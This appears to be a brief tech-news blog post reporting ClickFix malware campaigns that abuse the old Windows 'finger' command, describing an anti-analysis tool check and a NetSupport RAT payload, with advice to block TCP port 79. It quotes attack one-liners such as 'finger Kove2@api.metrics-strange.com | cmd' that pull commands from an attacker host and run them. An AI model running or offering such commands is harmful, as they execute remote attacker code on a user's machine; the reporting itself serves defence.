NG Solution Team
Technology

Are threat actors reviving the ‘finger’ command for new ClickFix attacks?

Threat actors have resurrected the decades-old “finger” command to enable remote command execution in new ClickFix malware attacks. A batch file was identified exploiting the “finger root@finger.nateams[.]com” command to retrieve and execute commands via cmd.exe. Further investigation uncovered a ClickFix campaign using the “finger Kove2@api.metrics-strange.com | cmd” command, similar to another reported campaign. This intrusion was more sophisticated, targeting malware research tools like WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere. If no malware analysis tools are found, a PDF-spoofing ZIP archive is loaded, extracting the NetSupport Manager RAT package. To counteract this exploitation, blocking outgoing traffic to TCP port 79 is essential.

Related posts

Is Samsung’s Galaxy S27 Pro the New Compact Flagship with Ultra Cameras?

James Smith

How is Swedish startup Flox using AI to promote human-wildlife coexistence?

Jessica Williams

How is PEAK:AIO planning to accelerate its growth with new funding?

Jessica Williams

Leave a Comment

This website uses cookies to improve your experience. We assume you agree, but you can opt out if you wish. Accept More Info

Privacy & Cookies Policy